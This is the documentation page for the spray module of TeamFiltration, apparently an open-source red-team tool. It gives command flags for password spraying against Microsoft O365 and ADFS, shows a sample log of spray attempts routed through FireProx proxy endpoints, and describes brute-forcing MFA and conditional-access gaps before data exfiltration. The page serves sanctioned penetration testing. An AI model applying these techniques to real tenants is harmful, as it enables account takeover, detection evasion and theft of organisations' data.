-
Notifications
You must be signed in to change notification settings - Fork 128
Spraying
TeamFiltration's spray module provides password spraying capabilities for Microsoft O365 tenants (both non-gov and gov), as well as ADFS.
--spray Load the spraying module
--aad-sso Use SecureWork's Azure Active Directory password brute-forcing vuln for spraying
--us-cloud When spraying companies attached to US Tenants (https://login.microsoftonline.us/)
--time-window Defines a time windows where spraying should accour, in the military time format <12:00-19:00>
--passwords Path to a list of passwords, common weak-passwords will be generated if not supplied
--seasons-only Password genersated for spraying will only be based on seasons
--months-only Password generated for spraying will only be based on months
--common-only Spray with the top 20 most common passwords
--combo Path to a combolist of username:password
--exclude Path to a list of emails to exclude from spraying
--sleep-min Minimum minutes to sleep between each full rotation of spraying default=60
--sleep-max Maximum minutes to sleep between each full rotation of spraying default=100
--delay Delay in seconds between each individual authentication attempt. default=0
--push Get Pushover notifications when valid credentials are found (requires pushover keys in config)
--push-locked Get Pushover notifications when an sprayed account gets locked (requires pushover keys in config)
--force Force the spraying to proceed even if there is less the <sleep> time since the last attempt
By default, TeamFiltration will pull and target the validated emails from the local database for password spraying. If no password list is provided using the --passwords argument, a series of commonly used passwords based on the Month, Season, and year will be automagically generated. You can also choose to generate either of them specifally using --seasons-only, --months-only or --common-only.
[♥] TeamFiltration VX.X.X PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed --outpath F:\Dev\skywalker --config F:\Dev\config.txt --spray
[+] AWS SecretKey and AccessKey found, FireProx endpoint will be automagically created for each spray-rotation
[SPRAY] 23.01.2023 06:55:24 EST Sleeping between 60-100 minutes for each round
[FIREPROX] 23.01.2023 06:55:28 EST Created endpoint https://XXXXXXXXXX.execute-api.eu-central-1.amazonaws.com/fireprox/
[SPRAY] us-west-1 23.01.2023 06:55:30 EST Sprayed [email protected]:January2023 => INVALID
[SPRAY] us-west-1 23.01.2023 06:55:30 EST Sprayed [email protected]:January2023 => INVALID
[SPRAY] us-west-1 23.01.2023 06:55:30 EST Sprayed [email protected]:January2023 => INVALID
[SPRAY] us-west-1 23.01.2023 06:55:31 EST Sprayed [email protected]:January2023 => INVALID
[SPRAY] us-west-1 23.01.2023 06:55:31 EST Sprayed [email protected]:January2023 => INVALID
[SPRAY] us-west-1 23.01.2023 06:55:31 EST Sprayed [email protected]:January2023 => INVALID
[FIREPROX] 23.01.2023 06:55:32 EST Deleted endpoint https://XXXXXXXXXX.execute-api.eu-central-1.amazonaws.com/fireprox/
When a valid set of credentials is found, TeamFiltration will store it's access token in the database, upon successful login. The account will also be excluded from all future spraying attempts
This access token, together with the accompanying refresh token, is used when performing the exfiltration of data through the exfiltration module. This allows TeamFiltration to avoid creating unnecessary interactive login when moving into the post-exploitation phase.
If a valid set of credentials is found, but the login attempt was blocked due to MFA or other restrictions enforced by conditional access. TeamFiltration will store the valid credentials in the database, and when targeted in the exfiltration module, identify a gap in the policies(s) by brute-forcing a series of login combinations with unique combinations on Resources URI, ClientId, and Device.
Example